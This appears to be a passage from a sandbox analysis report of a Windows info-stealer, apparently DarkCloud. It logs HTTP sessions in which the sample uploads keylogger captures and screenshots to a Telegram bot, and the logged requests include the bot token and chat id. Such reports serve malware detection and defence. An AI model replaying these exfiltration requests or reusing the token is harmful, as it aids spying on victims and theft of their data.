                                                                                      2024-11-25 12:40:15 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:22 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:40:21 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 600
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.649862149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:40:23 UTC559OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 7003
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:40:23 UTC7003OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 61 55 6c 4f 66 63 44 44 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 37 3a 33 39 3a 32 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 33 39 3a 33 32 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 33 39 3a 34 32 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataaUlOfcDD.txt"Content-Type: application/octet-stream[07:39:29]<<Program Manager>>[07:39:32]<<Program Manager>>[07:39:42]<<Program Mana
                                                                                      2024-11-25 12:40:24 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:40:24 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 595
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-25 12:40:24 UTC595INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 35 30 36 38 30 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 31 31 35 38 35 30 36 38 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 52 77 65 62 63 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":2532,"from":{"id":8165068013,"is_bot":true,"first_name":"Darkcloud_Result_box8","username":"Darkcloud_Result_box8_Bot"},"chat":{"id":6115850689,"first_name":"Chi","last_name":"Boy","username":"HRwebc","type":"private"},"d


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.649876149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:40:29 UTC562OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:40:29 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 42 64 65 43 6d 51 71 47 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotBdeCmQqG.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-25 12:40:29 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:29 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:40:29 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:29 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:40:29 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:29 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:40:29 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:29 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:40:29 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:33 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:40:33 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 600
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.649892149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:40:35 UTC558OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 634
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:40:35 UTC634OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 4b 61 74 4e 52 58 49 4b 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 32 34 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 32 34 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 32 34 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataKatNRXIK.txt"Content-Type: application/octet-stream[07:40:24]<<Program Manager>>[07:40:24]<<Program Manager>>[07:40:24]<<Program Mana
                                                                                      2024-11-25 12:40:36 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:40:36 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 594
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-25 12:40:36 UTC594INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 35 30 36 38 30 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 31 31 35 38 35 30 36 38 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 52 77 65 62 63 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":2534,"from":{"id":8165068013,"is_bot":true,"first_name":"Darkcloud_Result_box8","username":"Darkcloud_Result_box8_Bot"},"chat":{"id":6115850689,"first_name":"Chi","last_name":"Boy","username":"HRwebc","type":"private"},"d


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.649901149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:40:39 UTC562OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:40:39 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 71 78 43 6e 52 4b 48 4f 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
